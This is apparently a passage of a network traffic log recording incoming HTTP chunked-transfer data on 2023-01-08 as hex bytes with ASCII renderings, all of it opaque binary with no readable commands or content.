2023-01-08 15:15:31 UTC	344	IN	Data Raw: 32 30 30 30 0d 0a ca a4 84 83 47 a1 e1 da 92 0f c0 7b 5a e9 0f 16 ef 8e 19 7d ad e9 a9 a6 1b ad 0b 44 96 00 1d 60 2e 8c 7d 62 47 66 1c 9d 0b 91 1d 39 e3 18 5c 17 7e eb 50 17 3d 0e a5 84 4d 3e 3c 23 89 fd 2f 6a 3e ca 96 f9 9f 40 7f 03 3f c6 35 e4 ab f8 56 51 d6 a0 df 45 0f 88 1f 01 0c e9 c7 00 9e 6d bd 3a 47 9b 58 aa 25 87 8a e6 47 82 af 9a ef 9e 3f cd e4 c0 e9 c4 ec 62 b2 e7 58 ef 3a c5 81 f4 66 82 ae 2c 7f 34 21 0f 67 ac dc 3e 03 4f bd 84 a1 ec bf cb bb bf d6 bf 7f 3e b8 36 e8 a1 37 67 2e 20 76 db f2 31 8e 43 9a 32 d3 a3 18 fe 61 1f 8c b2 ad 24 d9 b3 92 f3 06 b1 ec 14 d3 c5 7b 2d 01 68 e5 70 d3 5c a8 ed 14 f6 33 6c 47 01 92 dc f2 3d cb 36 e9 f6 a9 4a 5d c1 e4 a2 ef 52 b5 24 cf d7 e8 db ce 10 b2 23 cc df 20 34 2a 82 76 4b 7a cb 4a 9d 7f 24 63 e6 e2 73 de Data Ascii: 2000G{Z}D`.}bGf9\~P=M><#/j>@?5VQEm:GX%G?bX:f,4!g>O>67g. v1C2a${-hp\3lG=6J]R$# 4*vKzJ$cs
2023-01-08 15:15:31 UTC	352	IN	Data Raw: 79 05 1a ac 6b e8 Data Ascii: yk
2023-01-08 15:15:31 UTC	352	IN	Data Raw: 0d 0a Data Ascii:
2023-01-08 15:15:31 UTC	352	IN	Data Raw: 32 30 30 30 0d 0a dd 88 17 d3 34 c5 e2 50 7f a5 1c 3e 8d 41 2c e9 0a 59 2d fd c4 9e e5 bf 3c 86 5a 03 18 9e 3f 84 16 cc 17 50 96 29 f6 40 96 fd 4a b6 a1 2b 60 ed a1 bc b2 57 9e 24 8f 66 e2 45 cd eb 52 90 7c d7 5f 4e a1 2c e2 1e 0d f5 f0 1f 5d 16 6c b9 5f 72 41 5a cb 9d c5 ec ac 2c 7e 91 af 36 91 f3 7e 7c 53 5e 4e 72 83 72 25 65 41 e0 9a fb 84 37 90 23 2a 7f 40 08 8f 9e 7e 0d 1e f7 c1 7a 6e ee bc 87 2e 2e e7 a7 97 85 a9 87 06 71 b1 5e 88 ea 31 a6 0b cd 9b 07 2a b5 fb bb a2 12 e6 13 9b 03 4e 4f 84 59 f8 f0 ad 39 50 84 40 2b d1 a1 5b 43 c9 70 56 93 a5 10 e5 37 60 e0 a0 0b d7 2f 2e fd a8 8a d1 3f 62 84 05 5a 3e de 05 8a 60 03 d0 1b d8 eb dd 31 45 90 96 dc eb 29 c8 86 67 49 2c e4 b3 ea 54 3b b3 2d 68 b8 22 74 8e f2 d9 46 90 ae 77 7a 2e 86 09 37 8e 5c d4 c6 ee Data Ascii: 20004P>A,Y-<Z?P)@J+`W$fER\|_N,]l_rAZ,~6~\|S^Nrr%eA7#@~zn..q^1NOY9P@+[CpV7`/.?bZ>`1E)gI,T;-h"tFwz.7\
2023-01-08 15:15:31 UTC	360	IN	Data Raw: 81 c4 7e d6 67 38 Data Ascii: ~g8
2023-01-08 15:15:31 UTC	360	IN	Data Raw: 0d 0a Data Ascii:
2023-01-08 15:15:31 UTC	360	IN	Data Raw: 32 30 30 30 0d 0a 8e c0 54 3a 58 9f 23 42 14 56 10 58 8b fa 92 91 ca fd bf 04 16 c5 c2 e7 f0 8d dc e0 b4 1d 7f 3c e2 92 d1 da cc 54 65 40 86 a3 32 4a 7f cd fb 5e ec a1 81 ac 6d 51 58 31 0d 6c c7 bc 8b 77 90 04 8c 79 28 db d9 36 80 76 53 ff 98 7d bd 9a b9 a0 4c 7a 9e ab b4 1d 21 f0 98 dd 63 4f ed e1 0d c7 89 2a 09 79 6e fc a4 53 f3 e9 a9 90 e9 af 4c c1 dc 7f 5c cd 29 8f d2 d0 31 e2 95 fe 0f da 6e af 56 de a8 b2 80 3c 2a 17 8c 72 9e 6a 9d 51 05 b2 63 0b 59 92 16 d1 6e 20 f0 d0 6f 7b 90 0b d1 92 3e ab 8f 01 8b 8c 72 6c a8 7e ca dc b7 ad e5 b1 3b 68 54 ab 97 e4 5c 2c 03 62 45 36 d6 f3 0b fd 5d eb ef a5 8d 0d 1b a8 fa c2 5b 81 88 3a 8e 6e c1 3b 49 cf 86 b2 5a 59 74 21 cb b3 30 a9 82 7b 14 0f bf 12 1f f2 26 cc 26 3d c4 a5 7c 63 c9 f1 a1 4f 55 f7 4f 92 e5 19 f0 Data Ascii: 2000T:X#BVX<Te@2J^mQX1lwy(6vS}Lz!cOynSL\)1nV<rjQcYn o{>rl~;hT\,bE6][:n;IZYt!0{&&=\|cOUO
2023-01-08 15:15:31 UTC	368	IN	Data Raw: b1 b0 fa 87 35 86 Data Ascii: 5
2023-01-08 15:15:31 UTC	368	IN	Data Raw: 0d 0a Data Ascii:
2023-01-08 15:15:31 UTC	368	IN	Data Raw: 32 30 30 30 0d 0a 38 3c d7 72 3c 72 03 19 0a f9 3c 71 5c d0 84 28 81 3b e5 f2 ab e7 84 bc 37 29 d6 33 a7 ba bb eb 0c 97 94 2c 0c d4 fd 8e 8b 36 f2 01 20 76 50 89 dc 71 33 54 c2 da 3d 68 8a 89 cc 30 b2 c1 12 59 e8 e6 49 03 40 82 bb 75 9d 2b f0 ff ec 1d ab 18 06 99 e5 54 3b 50 09 e5 2e 5e f8 69 89 16 e2 46 17 91 e8 aa 9a 03 b5 28 ca b0 4f 6c 15 48 a3 f4 15 d3 d3 16 70 f3 d4 0b e7 c6 ec 8f 35 39 7f c9 b3 44 5e da 2a a6 44 28 95 50 5b c6 85 39 fa ae 75 9e 2c 92 ad a4 d5 7d bb 9d df 46 0e 94 cd 3c c7 f1 e9 58 f3 7a d7 39 3d 25 de 95 81 c4 69 b8 6b 8d 94 21 c1 4c c5 a7 a2 51 c7 54 95 11 cf b3 74 c0 37 e2 a9 1f 35 fc ad 77 32 23 0b 84 b7 5f 0f 9d 75 1f 86 94 f7 22 de 70 9d 6f c6 99 53 88 17 5a 78 4b d8 cc 4f bf 16 cf 79 f7 20 12 71 8e 1b bc c2 d2 88 21 32 ad c1 Data Ascii: 20008<r<r<q\(;7)3,6 vPq3T=h0YI@u+T;P.^iF(OlHp59D^*D(P[9u,}F<Xz9=%ik!LQTt75w2#_u"poSZxKOy q!2
2023-01-08 15:15:31 UTC	376	IN	Data Raw: a9 3f ed da 11 80 Data Ascii: ?
2023-01-08 15:15:31 UTC	376	IN	Data Raw: 0d 0a Data Ascii:
2023-01-08 15:15:31 UTC	376	IN	Data Raw: 31 66 66 38 0d 0a cb 5c d6 81 83 d6 9d 35 5d f4 ec ad 13 39 c8 ec f0 84 52 ff 39 be 3d 6c 96 df 20 74 49 84 3c ca ca c1 97 5c 0c bd 06 be e0 be 32 bb 17 5e 70 10 06 53 2e cc e9 a6 10 85 ae 07 69 5e 51 cc 30 d5 d5 55 b2 52 f6 fb af f5 f0 fd ec 3d 92 a4 f7 c8 fc 88 d4 08 49 b5 c5 cd 53 d3 9e 22 ca ef 0b b9 41 7f 13 fe 8a dc a9 f3 02 4f 1d ff 92 6f 8a 8f 59 3b e2 d0 52 78 f4 c2 9c ba 9c 2e 16 ee 2c ee 75 7c d8 09 e9 5f 4b f0 ed 99 45 a6 28 63 be 5b c1 32 17 1a eb 31 f4 2c 58 af d2 b6 15 f2 80 d6 9d 53 b4 1b 09 43 55 ff d6 84 a4 8f 1d 18 75 02 ad f3 f8 ae ca 43 0f f4 8c 33 1f 76 16 a0 9d 7b 47 d7 e7 77 3e 91 71 0b 4d f4 6a 18 50 a2 4b 04 35 c3 39 d3 dc a7 b6 d9 cf a5 63 7d f6 3c e0 79 4b 53 d2 b0 70 c9 aa 53 ef 1c 2e 0f 62 9e 5e d5 35 b9 d5 8f 15 35 b3 7b 26 Data Ascii: 1ff8\5]9R9=l tI<\2^pS.i^Q0UR=IS"AOoY;Rx.,u\|_KE(c[21,XSCUuC3v{Gw>qMjPK59c}<yKSpS.b^55{&
2023-01-08 15:15:31 UTC	384	IN	Data Raw: 32 30 30 30 0d 0a Data Ascii: 2000
2023-01-08 15:15:31 UTC	384	IN	Data Raw: e3 0c bd 5c 55 71 26 12 95 7c 19 72 47 29 b6 be 01 4f 79 be 29 bd 7c fb 23 e2 f8 98 74 65 2c f2 12 75 3b 94 d4 e4 67 41 e1 fa 17 a6 e2 38 02 80 b0 96 cb 54 f6 c9 0b 2a 7f 14 db df c6 0f a6 9a 23 67 e2 29 fb 43 71 7d a8 3c 57 30 7c 00 93 ff a0 c8 7c 6d 23 91 3f 5a 2e 4c 98 53 ad 6e fd 73 1e 9e e8 11 3c be b3 47 06 fa 3c 56 10 39 96 78 d3 1b c0 aa 1e 2f 13 06 2d a5 98 48 d9 35 63 2a 73 aa 6e 0c 39 52 00 ae 12 e1 e8 69 a1 d5 66 38 80 9c 32 c5 f2 0a 73 0c be 55 4e b0 f6 3a e9 b3 ac 6c a4 19 49 bf 6a bb d9 8c 30 47 53 bd 82 01 11 8c ec f0 d6 63 c1 8e dc d9 21 e7 0a 55 99 fa 40 de 0d dc 0a b9 08 a7 c7 59 54 95 68 a8 21 8f 74 d9 a2 12 d4 4c 59 47 d2 0e b3 38 bd 52 0e 4c 67 cb 41 2e 3d 96 10 e7 3e 24 2c 7d 50 9a 3b a5 97 6a 34 33 05 6e 72 da 46 0f de 6e 62 ee 69 Data Ascii: \Uq&\|rG)Oy)\|#te,u;gA8T#g)Cq}<W0\|\|m#?Z.LSns<G<V9x/-H5csn9Rif82sUN:lIj0GSc!U@YTh!tLYG8RLgA.=>$,}P;j43nrFnbi
2023-01-08 15:15:31 UTC	392	IN	Data Raw: 0d 0a Data Ascii:
2023-01-08 15:15:31 UTC	392	IN	Data Raw: 32 30 30 30 0d 0a b5 48 d9 53 aa 0d 2f cf d5 34 d2 a0 0f 36 ef ee 7b e2 84 93 98 fd ce 77 6f fd 3a 01 7c 5d 9b ec 5a bf 7c 6e 29 9e 95 22 3c 6b 25 c7 3c bd e7 a9 bf 5a 55 74 4c 8d ad 90 4a ef 7f 44 bf 6b bc 8c b8 1f db e9 cb 59 28 4d 7d b3 4e cf ee 24 b1 56 dd 14 a1 08 a1 51 47 e7 16 52 3c 44 a2 94 88 71 8d b8 ed a4 78 9b 89 f7 75 09 ed 40 30 34 30 aa c1 24 57 62 46 a6 e3 4d 90 37 3a 1c 61 6d 3b 9e 9f 9f df e2 bb 08 1d df 5e 59 01 ef 85 65 cc cf f5 17 55 c0 39 a0 df 6c 0e 82 67 ee 50 9f 11 7c b5 c7 49 dc a5 da 83 4e af 05 25 3d 07 4a 4c 5f 59 3a 75 6c 4e 9d c2 c6 3c f5 94 7b ec fe 46 2b 8c b8 ba 65 2c a2 90 21 dc 5b de aa 01 e3 c5 4f b6 b3 58 b8 c5 f5 f4 8a 96 ee 62 4c 79 26 09 e3 e0 28 97 99 b0 72 5b 84 2e e8 2d 76 3b 6c fe 77 60 7f e2 09 8e 47 31 da 65 Data Ascii: 2000HS/46{wo:\|]Z\|n)"<k%<ZUtLJDkY(M}N$VQGR<Dqxu@040$WbFM7:am;^YeU9lgP\|IN%=JL_Y:ulN<{F+e,![OXbLy&(r[.-v;lw`G1e
2023-01-08 15:15:31 UTC	400	IN	Data Raw: 81 a6 29 99 5c 0d Data Ascii: )\
2023-01-08 15:15:31 UTC	400	IN	Data Raw: 0d 0a Data Ascii:
2023-01-08 15:15:31 UTC	400	IN	Data Raw: 32 30 30 30 0d 0a cb a8 b7 ff b0 d3 30 f0 6e cc a7 2f 62 0a 59 e1 88 ed 98 63 f0 61 82 27 80 8d 53 5c 96 f0 f4 43 97 d7 dc ef de 26 1a 90 33 31 c3 bb 25 6f af 86 04 10 df 7e b5 7e c4 b1 be 9c 8f 4e 71 e8 c3 3d bb b6 5b c5 5f f0 50 84 46 34 34 b3 9a 1b e3 ae ca b1 f9 9b 77 6e 65 84 ca 0c 5a cd 75 f0 23 f4 2c 0b a9 84 cf c1 0d ce 01 3a 54 59 b4 73 cf c9 53 72 02 3c 47 1b 2d b9 7c ce 99 1d ef 1d ac 58 b1 8f b7 81 2e 58 29 8a 62 00 09 51 bf a4 fb e3 2c fc 2c 94 b6 ce a6 4b d3 b2 77 ce 50 a1 c6 da 64 97 fa 52 fa 8d 2e e0 a4 ff 0f e6 be 12 4d 30 6b bd 94 66 80 3c 0d 14 c3 08 ce 63 85 51 15 3d 81 c4 7c a0 61 8c 1d f8 0e 43 74 f2 07 c0 92 ef eb dc d2 8e 14 75 38 13 3d 1b 94 ce b6 de 78 3d bc d4 a6 7a 4e d7 2c b1 36 c7 14 79 b6 27 46 4b 5e e7 b9 54 80 7b 4c 1b 93 Data Ascii: 20000n/bYca'S\C&31%o~~Nq=[_PF44wneZu#,:TYsSr<G-\|X.X)bQ,,KwPdR.M0kf<cQ=\|aCtu8=x=zN,6y'FK^T{L
2023-01-08 15:15:31 UTC	408	IN	Data Raw: 05 a1 99 59 7a e3 Data Ascii: Yz
2023-01-08 15:15:31 UTC	408	IN	Data Raw: 0d 0a Data Ascii:
2023-01-08 15:15:31 UTC	408	IN	Data Raw: 32 30 30 30 0d 0a e7 8a 34 94 29 83 c5 59 9d 19 ce ac 0b 55 c0 27 e8 8a c1 53 3f 58 58 26 f9 eb 0d 16 3b 23 72 f6 59 0a e6 6b 61 48 94 ec e4 ed f2 01 15 26 a8 e5 fd 7b ee 17 c6 ab 63 15 22 9d ec d2 48 c9 4e 43 b3 48 f5 40 74 59 0c e8 28 ab 9f 3a 23 94 ac cb 4b e3 2b 2d 82 85 10 f8 42 9f 00 f6 15 0b a3 a8 a1 c4 ed ee cc 9c e9 16 09 51 e3 59 41 6d a0 56 b8 2c a0 89 43 c0 7a b6 d6 5e 89 e6 77 fa b2 de a2 7b ce 09 5a 0c 8a cc 1a 66 1a 59 03 c2 65 22 e9 d0 ab c2 1c 2f a6 5a a2 45 55 d4 13 fa ad d1 d7 65 d3 4e 86 e0 28 72 7c 42 39 03 60 af ab c3 a2 1b 2f 1d 8c 10 e8 8f 8a 6e 40 07 ae 69 ab f7 24 3d 6a ce 0c 12 33 0a f7 bf 93 1e 36 e2 36 69 7c 68 d4 44 10 54 0a c1 4a 74 28 90 b0 0e a3 4a 0d 82 0d 8b 1d 4b 8b 84 6a 00 dc fd d6 bc 71 f3 3c 6d 31 97 52 df 3d 6e 8f Data Ascii: 20004)YU'S?XX&;#rYkaH&{c"HNCH@tY(:#K+-BQYAmV,Cz^w{ZfYe"/ZEUeN(r\|B9`/n@i$=j366i\|hDTJt(JKjq<m1R=n
2023-01-08 15:15:31 UTC	416	IN	Data Raw: 8f 3a de 0b b4 ee Data Ascii: :
2023-01-08 15:15:31 UTC	416	IN	Data Raw: 0d 0a Data Ascii:
2023-01-08 15:15:31 UTC	416	IN	Data Raw: 32 30 30 30 0d 0a ea d3 0b ef f1 dd be b0 66 78 05 45 ef ac 71 f5 5c ad b0 a1 5c fd f5 6a 63 34 5f e7 e9 95 d8 2c 60 e6 6f 40 6e 77 a2 9e 5c 58 08 b9 54 cc 4a 58 a7 71 3d 70 48 e9 91 05 b1 36 cc ba ba c9 2e 3b 76 65 12 e1 27 08 00 d1 af 20 ac 53 cc 73 68 f3 c1 06 6d d2 09 90 64 c2 18 eb 3e d6 3e 2c e1 a5 2d 4c 1b 89 82 97 7d ac 68 65 a5 c2 91 cf b0 75 f2 5f 7a b3 72 41 3b 49 a4 e4 ea e2 c7 5b f1 d0 7d 24 35 75 3f 79 94 55 44 af c2 b4 f1 14 b4 05 53 2d f6 df e5 0e 6b 7e 84 55 27 a9 fb 2f 4d 47 e5 0f a7 f0 5f 99 9d be 59 bd 7f be 96 09 96 c1 b8 20 f7 cf 56 69 32 9d 02 e7 8a 8f e2 cc 9b 94 16 79 05 a0 e7 d6 59 91 bb ed 13 26 10 b9 b9 7d 70 7d a1 f1 8f 1d 4c 91 87 a5 3b c0 27 4c 69 36 4e 3e 01 2d b9 5f 44 4c 6f 6e 88 4d e5 33 cf 68 5d e7 f6 6c 23 99 e7 36 d5 Data Ascii: 2000fxEq\\jc4_,`o@nw\XTJXq=pH6.;ve' Sshmd>>,-L}heu_zrA;I[}$5u?yUDS-k~U'/MG_Y Vi2yY&}p}L;'Li6N>-_DLonM3h]l#6
2023-01-08 15:15:31 UTC	424	IN	Data Raw: eb d3 64 00 e6 ba Data Ascii: d
2023-01-08 15:15:31 UTC	424	IN	Data Raw: 0d 0a Data Ascii:
2023-01-08 15:15:31 UTC	424	IN	Data Raw: 32 30 30 30 0d 0a e3 96 e8 85 5b 0a 19 23 a0 24 89 5f 1e df 1d ae 30 ad 1a cf 5b f2 50 41 57 92 7c 71 24 c2 61 ab f1 50 3c 02 02 00 29 45 85 e1 3c 2c ab 19 cb e2 11 26 e8 dd 33 f6 7a 9a df ed de 20 e7 65 f6 c4 b3 b8 92 cc dd 2c 1b 54 05 e0 91 a6 4c 02 8f 86 5c e8 2e 4d 32 ef 20 48 df 15 e4 cf 26 e2 c8 28 b7 81 53 65 c0 49 0b 35 17 24 22 25 88 cb 64 92 c4 08 80 a4 78 41 24 1e 4b 0b 12 fe ad 80 1f 26 9b ab 78 6a 3b 78 ac 9c ba 0e 34 77 99 a2 35 f7 6f 12 31 7f 96 90 9e bc 4e ca c3 d5 4c ae cf 4f 7e 5f 81 12 cb d0 e6 62 56 5b eb af c8 50 cd 23 98 ec 4e f2 b8 c4 4f a6 da ef a1 fe c7 8c bc 36 84 8f 4b 7f f5 0e ad 49 d7 e1 a9 49 0d 7b ad b9 17 0b 62 9d 7c 0c 54 98 39 2a a4 11 08 71 47 fe 59 43 7f 04 03 20 81 24 82 b1 bf 0f 66 74 a2 39 85 95 aa 30 63 42 96 5a ea Data Ascii: 2000[#$_0[PAW\|q$aP<)E<,&3z e,TL\.M2 H&(SeI5$"%dxA$K&xj;x4w5o1NLO~_bV[P#NO6KII{b\|T9*qGYC $ft90cBZ
2023-01-08 15:15:31 UTC	432	IN	Data Raw: 5b 9f b3 99 46 b0 Data Ascii: [F
2023-01-08 15:15:31 UTC	432	IN	Data Raw: 0d 0a Data Ascii:
2023-01-08 15:15:31 UTC	432	IN	Data Raw: 32 30 30 30 0d 0a 78 ab 80 eb 5d d1 20 82 8d 22 e8 90 63 3a 97 5d 6f 2f 08 a9 51 a6 83 27 60 29 02 ca 48 fe d5 cc 8e 54 dc 95 2e e9 af 96 65 6d b5 3f 0f 82 cb 1b 1c 69 8a 56 bc 52 4e 56 c7 cb 7c e3 ca d2 4f d2 d0 09 d8 33 40 26 29 d2 5c 65 4a cc 05 60 54 44 13 c0 b2 6e 57 14 aa b8 08 a8 21 e6 3e bf bd 13 7c 61 c5 f7 53 42 f8 c7 2b e6 c1 8a e8 e5 81 9c 85 e5 27 b0 42 52 08 af 6c 43 2f 79 79 7f 69 00 a5 64 e3 52 14 56 ca ce e5 7e eb 99 c0 f5 33 52 bb 5e 21 bb 1b b2 d9 bc 8c 70 57 aa ad 3b c1 1a 06 b0 af 63 2c 2f 7f 90 42 c4 72 6f b3 12 68 3d b7 d3 f3 47 42 63 72 41 b5 55 81 0f 28 aa a0 dc cc 2a 03 2c 87 c9 4e b8 a7 f1 48 0a ac e2 04 f6 b8 fe 1e ab 03 64 68 a1 d7 e2 b3 30 ae 5a b0 03 60 6e ba 05 65 4c 7a 09 53 8b c4 8f 62 f8 22 c4 05 9f 94 10 1f 74 25 c7 b5 Data Ascii: 2000x] "c:]o/Q'`)HT.em?iVRNV\|O3@&)\eJ`TDnW!>\|aSB+'BRlC/yyidRV~3R^!pW;c,/Broh=GBcrAU(*,NHdh0Z`neLzSb"t%
2023-01-08 15:15:31 UTC	440	IN	Data Raw: f3 7c 7b 20 e2 29 Data Ascii: \|{ )
2023-01-08 15:15:31 UTC	440	IN	Data Raw: 0d 0a Data Ascii:
2023-01-08 15:15:31 UTC	440	IN	Data Raw: 31 66 66 38 0d 0a 0f f2 05 48 69 c7 83 41 06 fd 42 8c 9f 3d 02 b1 6a 5c a4 25 28 17 69 66 5a 77 36 44 64 2e 89 f4 65 5d 53 80 e8 23 b8 40 83 ab 49 a9 03 49 bb 46 3e 81 a2 5f 84 68 55 7b ae 51 7a 5c bb 8f a3 3e a7 78 e4 38 6c 7f fe 8f d6 ae 31 74 f9 e5 13 14 b4 df 84 57 54 9d 89 b3 6d e6 2f 30 91 19 48 1e e5 a3 06 a6 f1 5f 8b 83 96 f1 f6 76 1e 54 74 f6 eb 96 99 8a a9 a3 2b ee fb aa d0 d4 9d 9c 2c 9e 89 ae ed ba 09 41 b6 d1 0b 4c ce 81 60 67 f6 15 15 14 88 30 9d 9c c9 bf b2 d8 3d 34 5a ca 4d b3 8d 04 99 c1 38 48 fc b2 eb 23 c7 b8 1b 61 f9 8f 8b 66 05 88 5c 53 ef d4 7c ea da e7 44 8c 4a f2 79 a4 3f 87 ee 59 2b 2a 65 85 55 1f fa 23 14 06 0d 1a 24 f3 bc 29 02 96 be bc b5 51 43 22 d0 5a bb 7e c6 67 d2 5b d9 68 1f 06 c2 25 94 88 fc e8 48 8e d8 03 98 dd da 7e 3f Data Ascii: 1ff8HiAB=j\%(ifZw6Dd.e]S#@IIF>_hU{Qz\>x8l1tWTm/0H_vTt+,AL`g0=4ZM8H#af\S\|DJy?Y+*eU#$)QC"Z~g[h%H~?
2023-01-08 15:15:31 UTC	448	IN	Data Raw: 32 30 30 30 0d 0a Data Ascii: 2000
2023-01-08 15:15:31 UTC	448	IN	Data Raw: 01 43 81 69 21 c6 5b 1f 9b 74 01 10 f9 a1 f3 3f 95 5b b2 32 28 5a 29 84 c3 a3 a9 cb 01 12 39 ae 8b 57 22 05 09 6f 86 ae 97 1d 98 37 24 91 dd 6a 0a 47 31 52 69 e3 da a4 ac 49 07 6f 7f fd 44 35 ca 21 16 1f 83 ad 26 4a 20 2c 31 58 a5 b6 48 0b 40 70 d6 e0 d6 53 e8 37 2d 7b b3 7d 10 c4 a5 0c 1b 96 1f 9a 7f 0b 6b a9 44 5f be 29 b9 cd 8b 63 ae 09 5a 36 6d bd e2 e6 a6 84 31 df c7 3f ad 90 e4 d5 17 92 a0 63 d4 3c 9c 77 71 92 e7 86 4a 92 e7 db ae 48 48 79 ba fa 6e 02 bc 70 01 7a 0b d3 0f aa 2c ed 38 e0 1c 22 63 8d dc 9b 59 84 b9 86 37 a4 14 e1 64 af e1 3a c2 35 7c 82 a7 96 ec 50 cb a1 f5 7b bd 51 ad 61 c5 b1 3a 8c fa 15 d2 d4 f1 7c e4 00 3c e0 dd 03 4a d9 2e da 2a 0f 4d db a9 2d 54 2a 8f e4 5f 54 a4 3c 7d ae ed bc 89 9b 36 2a c6 5f 66 b8 70 fb b3 6a 15 00 5e 09 1c Data Ascii: Ci![t?[2(Z)9W"o7$jG1RiIoD5!&J ,1XH@pS7-{}kD_)cZ6m1?c<wqJHHynpz,8"cY7d:5\|P{Qa:\|<J.M-T_T<}6*_fpj^
2023-01-08 15:15:31 UTC	456	IN	Data Raw: 0d 0a Data Ascii:
2023-01-08 15:15:31 UTC	456	IN	Data Raw: 32 30 30 30 0d 0a 55 2a 3c 48 35 75 ce 0b a0 7b b7 4a 3b d0 43 b8 1e 50 63 20 48 31 cb c8 87 e8 59 e5 4d d1 e3 15 42 f1 42 89 fe 3c 09 60 04 b4 32 9a 6d b0 c3 08 76 6b 34 62 01 96 ae d3 3c 63 db aa 06 ef e7 d2 ce 73 12 a1 a5 5a 06 47 94 00 ec 2a c3 9c 55 80 65 d9 1d 65 d4 b3 f0 84 be 2e 63 2c 53 86 a5 20 73 8e f5 a6 a3 7a 57 57 4d 51 a0 73 4c b1 60 ae 1f 4f 91 fb c8 4d 4d 0a 6f 01 f1 73 3d 92 d1 80 f2 47 b1 0b 9c 6b 27 8f 97 6e f8 23 21 cb 41 ba 80 5c 7f 89 90 9c 37 54 48 5d 5f 2e ef 4d 2a 90 d2 29 f5 65 94 db 9a 5e 62 a6 10 fa 8a 2c 69 fd 36 7a b1 bf 7d 87 16 dd 88 52 72 88 45 9a f3 56 0f cc c3 aa 9e 0b 51 ae 11 7f 48 6d 29 3b 52 3d 37 94 b7 fb ed ba f5 1c b1 db 5e 6e f7 55 ef 61 9f 09 6a c9 88 c0 b8 f0 47 e7 b3 0e 9d b9 e1 18 c0 d3 17 f3 cb 32 54 18 c6 Data Ascii: 2000U<H5u{J;CPc H1YMBB<`2mvk4b<csZGUee.c,S szWWMQsL`OMMos=Gk'n#!A\7TH]_.M*)e^b,i6z}RrEVQHm);R=7^nUajG2T
2023-01-08 15:15:31 UTC	464	IN	Data Raw: 9e b8 11 88 2e 3e Data Ascii: .>
2023-01-08 15:15:31 UTC	464	IN	Data Raw: 0d 0a Data Ascii:
2023-01-08 15:15:31 UTC	464	IN	Data Raw: 32 30 30 30 0d 0a 85 d2 fc 5f b9 4c 8f 08 93 64 46 df bc 73 b5 c9 f9 cb c2 c6 2d 51 ad e7 5b e4 6d 54 77 fd 74 79 08 86 38 fd 68 50 0c e6 8e 53 f1 33 94 2e 12 5d 4c b7 87 94 70 94 cd f6 10 68 18 92 67 2e 3a df bf 6e 41 d6 6f 4c e4 9b 7e 8f 97 df 79 d1 4c f3 0c 95 6d 66 3b 2c db bd 11 73 d0 43 33 5e 5a 14 10 e1 1b 4f b7 f9 9e 3b 63 e2 a9 c3 cf 96 90 b2 58 08 1d 03 f7 ac 1e b9 cb 19 49 63 3b c4 b2 06 98 3d b9 0c 78 d1 7c 70 05 de d4 8a 6b 6b db 10 f0 03 19 4c f8 6c 67 4f 21 55 a3 8c cc cd 25 a3 d8 46 f0 f6 0b a6 97 d7 3b 95 49 45 18 e5 50 c3 e8 eb f0 57 9e 65 f2 70 0e d2 02 15 db f5 a5 3e e9 ef ac 7d e3 61 ad 5f 92 6e 45 05 8d b1 3e f9 0c 44 5e 16 60 7d b4 c6 f5 32 b3 f6 cf fe 65 52 c7 69 5e 95 49 1a 1b 3e 31 51 0d ff d0 12 27 63 f8 73 f6 49 f0 f0 a6 ba ee Data Ascii: 2000_LdFs-Q[mTwty8hPS3.]Lphg.:nAoL~yLmf;,sC3^ZO;cXIc;=x\|pkkLlgO!U%F;IEPWep>}a_nE>D^`}2eRi^I>1Q'csI
2023-01-08 15:15:31 UTC	472	IN	Data Raw: 23 75 d0 51 93 5c Data Ascii: #uQ\
2023-01-08 15:15:31 UTC	472	IN	Data Raw: 0d 0a Data Ascii:
2023-01-08 15:15:31 UTC	472	IN	Data Raw: 32 30 30 30 0d 0a 17 5c ac 24 dc 02 76 2e 3e 51 5b 0a fc 88 30 4b f1 9e 22 11 a1 3b 2f f2 41 a6 e6 cf e9 85 d9 6a bf 55 8a dc 68 0c 28 f0 67 39 88 48 54 5c 2f 40 1a e4 01 31 bd c7 e5 c1 bb c8 87 57 95 95 e1 91 e4 22 65 cd 30 dc 43 81 d2 82 63 94 c4 e6 c7 66 e7 bc 6b b7 d5 f2 62 b4 e6 88 3f 97 71 13 7f 17 30 4c bb 6c bb 66 ef 50 4f 11 75 10 aa c6 8f ab cd e2 1b e4 4c 8d 25 05 35 23 a8 ba 68 7d de b1 18 cb 2c 91 81 1c 3a 38 3d 0f 1a a0 f1 89 71 8b bd 25 be 2e 93 85 a8 cb 6f 9d e2 eb 1f 86 94 b6 d5 8c db 21 6f f6 7b 03 b3 e0 5e db 9d 9b b2 c9 da 2a 65 e7 34 53 95 10 54 c6 a8 a3 50 25 e5 81 30 2f 4d e0 4e d7 f6 61 b8 b4 27 d7 e0 3a 95 26 c3 be 49 b5 46 09 fa ad 89 bf 0e 7c ee 7f 7e e7 41 de 7d 45 4a db ba 56 a2 f2 7f 03 26 50 fc 34 cc 18 c9 dc 7b 2c a1 3e 84 Data Ascii: 2000\$v.>Q[0K";/AjUh(g9HT\/@1W"e0Ccfkb?q0LlfPOuL%5#h},:8=q%.o!o{^*e4STP%0/MNa':&IF\|~A}EJV&P4{,>
2023-01-08 15:15:31 UTC	480	IN	Data Raw: d7 22 cc 7f bd 90 Data Ascii: "
2023-01-08 15:15:31 UTC	480	IN	Data Raw: 0d 0a Data Ascii:
2023-01-08 15:15:31 UTC	480	IN	Data Raw: 32 30 30 30 0d 0a b0 4f c8 f6 24 30 4e 0f cf fd 3c 62 f1 20 8d 0d ff 32 ef 6c bc 54 1c 8a 92 40 47 3b 63 75 a2 e7 af 76 40 25 13 00 e0 5c 02 f3 45 f6 b0 02 ea d5 6c 4d 5e 6d de f8 b6 a1 9c f9 3f 24 b3 f5 09 8e cc 7e 2f 59 14 eb 8a 9b d6 3c 3b c6 e4 b3 33 10 c9 73 4c 5d 21 ed b9 47 c4 0b ce 3d 31 8d 17 8c 77 79 8e fd 86 9c c0 00 dc 64 87 46 ab 45 ad 7b 89 6a 29 d3 3d a0 b0 db c6 df dc f2 f5 7f d1 7a b4 10 55 17 27 12 78 45 6e 38 d4 0f c3 75 62 a1 1e f9 73 68 d9 4e af 58 ea a2 37 29 0a 2f dd 44 46 a0 57 de 18 15 66 81 86 3a e7 e0 e1 13 7c f8 6c 21 70 47 6a 5b f7 7a 1a 4a 00 cd ca ed 8c 20 0c 03 c1 87 21 c4 01 c8 01 49 ec d3 86 49 78 be f3 c5 fd 74 9e 26 2f 38 d1 8e 99 23 c5 b1 fc 55 95 70 82 1a 26 6d 3a 2a 16 99 83 16 79 42 89 58 63 6f 09 f2 9b 72 d0 3b 91 Data Ascii: 2000O$0N<b 